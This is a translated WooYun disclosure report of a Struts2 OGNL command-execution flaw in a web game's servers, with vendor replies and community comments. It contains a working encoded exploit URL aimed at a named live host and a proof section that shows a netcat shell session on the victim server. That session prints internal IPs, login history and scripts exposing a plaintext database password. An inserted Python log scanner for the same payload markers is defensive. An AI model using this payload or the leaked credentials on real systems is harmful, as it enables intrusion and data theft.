
Vulnerability summary

Defect ID: wooyun-2013-028937

Title: Command execution vulnerability in the server side of a well-known WebGame

Vendor: 傲世堂

Author: 猪猪侠

Submitted: 2013-07-15 14:09

Fixed: 2013-08-29 14:10

Published: 2013-08-29 14:10

Vulnerability type: command execution

Severity: High

Self-assessed Rank: 20

Status: confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-07-15: details reported to the vendor, awaiting vendor handling
2013-07-15: vendor confirmed; details disclosed to the vendor only
2013-07-25: details disclosed to core white hats and domain experts
2013-08-04: details disclosed to regular white hats
2013-08-14: details disclosed to intern white hats
2013-08-29: details disclosed to the public

Brief description:

Because the game server is built on a third-party framework, a vulnerability in that framework resurfaces on every production server running the game.
A quick look shows that 4399, YY, 51wan, duowan, 51, 91, 浩方, 360, kugou, 七点 and Baidu all operate this game as partners, which means that uploading a shell to the server under a partner's domain indirectly yields read/write access to cookies on that partner's main domain; cross-site phishing and mischief galore!

Detailed description:

# Because the game server is built on the Java Struts framework, a command execution vulnerability exists!

http://s58.as.game.yy.com/root/chat.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29]
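As an added example (not part of the original report), the following is detection logic a defender could run over web server access logs to flag requests shaped like the payload above: it percent-decodes each query string (repeatedly, to catch double encoding) and looks for the OGNL markers that characterise this class of Struts2 parameter injection. The log lines are constructed for the example; the IPs are placeholders.

```python
"""Flag Struts2 OGNL parameter-injection attempts in access-log lines (added example)."""
import re
from urllib.parse import unquote_plus

# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers seen in the payload shape from this report, matched against the decoded query:
# a parameter name walking class.classLoader, the two XWork sandbox switches being
# flipped, an OGNL static call (@pkg.Class@method(), and a reference to java.lang.Runtime.
OGNL_MARKERS = [
    ("class_loader_param", re.compile(r"class\.classLoader", re.I)),
    ("deny_method_execution", re.compile(r"xwork\.MethodAccessor\.denyMethodExecution", re.I)),
    ("member_access_override", re.compile(r"#_memberAccess", re.I)),
    ("static_method_call", re.compile(r"@[\w.]+@\w+\(", re.I)),
    ("runtime_class_reference", re.compile(r"java\.lang\.Runtime", re.I)),
]


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing, so %2523 -> %23 -> # is caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ognl_markers(target):
    """Return the marker names present in the decoded query string of a request target."""
    query = target.partition("?")[2]
    if not query:
        return []
    decoded = decode_fully(query)
    return [name for name, pattern in OGNL_MARKERS if pattern.search(decoded)]


def scan_access_log(lines):
    """Return (line_number, client_ip, path, markers) for every line with at least one marker."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # malformed or non-request line
        target = match.group("target")
        markers = find_ognl_markers(target)
        if markers:
            client = line.split(" ", 1)[0]
            hits.append((number, client, target.partition("?")[0], markers))
    return hits


# Constructed sample log (placeholder IPs); line 2 reuses the encoded payload shape from
# the report without the exec() call, line 3 is a double-encoded variant.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/2013:11:02:13 +0800] "GET /root/chat.action?msg=my+class+is+online HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Jul/2013:11:04:51 +0800] "GET /root/chat.action?class.classLoader.jarPath='
    '%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c'
    '+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29%29'
    ' HTTP/1.1" 200 1024',
    '203.0.113.7 - - [15/Jul/2013:11:05:02 +0800] "GET /root/chat.action?x[%28class.classLoader.jarPath%29%28%27aa%27%29]='
    '%2528%2523_memberAccess%255B%2522allowStaticMethodAccess%2522%255D%253Dtrue%2529 HTTP/1.1" 500 0',
    'garbage line with no request field',
]

if __name__ == "__main__":
    for number, client, path, markers in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {client} -> {path} markers={markers}")
```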


# Affected domains, found with just a simple search; astd22.my4399.com implies astd21, astd20 and so on, roughly 20 servers, and likewise for the others.

Proof of vulnerability:

[root@localhost ~]# nc -l 53
Linux astd-f07-06.bjkd 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
uid=500(astd) gid=500(astd) groups=500(astd) context=user_u:system_r:unconfined_t:s0
last -n 10
xujp pts/0 10.6.20.242 Mon Jul 15 11:02 still logged in
xujp pts/1 10.6.20.242 Fri Jul 12 16:57 - 17:57 (01:00)
xujp pts/0 10.6.20.241 Fri Jul 12 16:29 - 21:11 (04:41)
xujp pts/0 10.6.20.241 Fri Jul 12 11:18 - 13:10 (01:52)
xujp pts/0 10.6.20.241 Thu Jul 11 17:58 - 21:10 (03:12)
xujp pts/0 10.6.20.241 Thu Jul 11 15:29 - 17:30 (02:00)
xujp pts/0 10.6.20.241 Thu Jul 11 09:39 - 15:11 (05:31)
xujp pts/0 10.6.20.241 Wed Jul 10 17:32 - 21:06 (03:34)
xujp pts/0 10.6.20.241 Wed Jul 10 12:34 - 15:08 (02:34)
xujp pts/0 10.6.20.241 Tue Jul 9 17:48 - 21:08 (03:19)
wtmp begins Tue Apr 10 00:53:09 2012
uname -a
Linux astd-f07-06.bjkd 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
cd ~
ls -lah
cat .mysql_history
cat updata_mail.sh
cat: updata_mail.sh: No such file or directory
ls
cat update_mail.sh
#!/bin/bash
DATE=`date +%Y%m%d`
if [ -f /home/astd/$1_mail.flag ];then
echo "$1 have insert mail"
else
PATH_dir=/app/astd_$1/logs/Game/DayReport
if [ -d $PATH_dir ];then
ps x |grep -w astd_$1|grep -v grep &>/dev/null
if [ $? -eq 0 ];then
rm /app/astd_$1/logs/Game/DayReport/*sh
rm /app/astd_$1/logs/Game/DayReport/*sql
rm /app/astd_$1/logs/Game/DayReport/*txt
wget -q -P $PATH_dir http://10.6.20.241/astd/patch/jisi_mail/jisi_mail_$DATE.sh
dbname=astd_$1
if [ -s $PATH_dir/jisi_mail_$DATE.sh ];then
cd $PATH_dir
sh jisi_mail_$DATE.sh
if [ -s $PATH_dir/mail.sql -a $? == 0 ];then
/usr/local/mysql/bin/mysql -uastd -p9BdcPAH4w -D$dbname <$PATH_dir/mail.sql
if [ $? == 0 ];then
echo "update $dbname SUCC"
touch /home/astd/$1_mail.flag
fi
fi
fi
else
echo "$1 is not exist"
exit 0
fi
else
echo "$1 is not main"
exit 0
fi
fi
cat update_ticket.sh
#!/bin/bash
if [ -f /home/astd/$1_ticket.flag ];then
echo "$1 have insert mail"
else
PATH_dir=/app/astd_$1/logs/Game/DayReport
if [ -d $PATH_dir ];then
ps x |grep -w astd_$1|grep -v grep &>/dev/null
if [ $? -eq 0 ];then
rm /app/astd_$1/logs/Game/DayReport/*sh
rm /app/astd_$1/logs/Game/DayReport/*sql
rm /app/astd_$1/logs/Game/DayReport/*txt
wget -q -P $PATH_dir http://10.6.20.241/astd/temp/jisi_20130628.sh
dbname=astd_$1
if [ -s $PATH_dir/jisi_20130628.sh ];then
cd $PATH_dir
sh jisi_20130628.sh
if [ -s $PATH_dir/mail.sql -a $? == 0 ];then
/usr/local/mysql/bin/mysql -uastd -p9BdcPAH4w -D$dbname <$PATH_dir/mail.sql
/usr/local/mysql/bin/mysql -uastd -p9BdcPAH4w -D$dbname <$PATH_dir/ticket.sql
if [ $? == 0 ];then
echo "update $dbname SUCC"
touch /home/astd/$1_ticket.flag
fi
fi
fi
else
echo "$1 is not exist"
exit 0
fi
else
echo "$1 is not main"
exit 0
fi
fi

Fix:

Upgrade to the latest Struts.

Copyright notice: when reposting, please credit the source: 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-07-15 15:55

Vendor reply:

Thanks, 猪猪侠!

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-07-15 11:29 | xsser certified white hat ( regular white hat | Rank:254 vulns:18 | Looking back on it all, will this world get better?)

    Asking for a remote code execution in Dota

  2. 2013-07-15 11:34 | 围剿 ( passerby | Rank:17 vulns:5 | Evil decimal)

    Awesome! This is a heavy-metal beat.

  3. 2013-07-15 11:47 | qiaoy ( regular white hat | Rank:110 vulns:16 )

    .

  4. 2013-07-15 12:04 | 齐迹 ( core white hat | Rank:784 vulns:100 | An ordinary PHP developer, interested in web security.)

    How should the sentence "causes the vulnerability in the third-party framework" be understood?

  5. 2013-07-15 12:13 | 摄影会长 ( intern white hat | Rank:81 vulns:14 | I'm a sockpuppet!)

    @齐迹 @xsser struts2, 2011, the coal boss is fooling you

  6. 2013-07-15 12:14 | 摄影会长 ( intern white hat | Rank:81 vulns:14 | I'm a sockpuppet!)

    @xsser go find a girlfriend already, still on about Dota..

  7. 2013-07-15 12:25 | 熊猫 ( intern white hat | Rank:64 vulns:33 | panda)

    Leaving my name

  8. 2013-07-15 14:08 | x-star ( regular white hat | Rank:124 vulns:13 | Windows/Linux Kernel. Information Secur...)

    @xsser @猪猪侠 that leaked, aren't you going to redact it?

  9. 2013-07-15 14:27 | mango ( core white hat | Rank:1668 vulns:248 | I have a silly girlfriend!)

    @熊猫 gotta leave my name too

  10. 2013-07-15 22:23 | 多多关照 ( regular white hat | Rank:271 vulns:23 | Big shots, please look after me!)

    This is the prelude to the big shot coming out of retirement

  11. 2013-07-16 09:44 | 傲世堂 (WooYun vendor)

    Since 5 vulnerabilities have been exposed in 2 days, we are recruiting a systems security engineer here; interested parties please contact me

  12. 2013-07-16 14:49 | wefgod ( regular white hat | Rank:1807 vulns:179 | More will than strength)

    @傲世堂 ha, coming to WooYun to recruit isn't a bad idea

  13. 2013-07-19 10:27 | 多多关照 ( regular white hat | Rank:271 vulns:23 | Big shots, please look after me!)

    @傲世堂 WooYun has a jobs page, http://www.wooyun.org/job.php?action=list

  14. 2013-07-23 17:06 | 傲世堂 (WooYun vendor)

    @多多关照 thanks, already emailed the official team

  15. 2013-08-14 19:30 | oldsun ( passerby | Rank:16 vulns:4 | 啪啪啪啪啪啪啪啪啪啪啪啪)

    This deserves 50,000 rank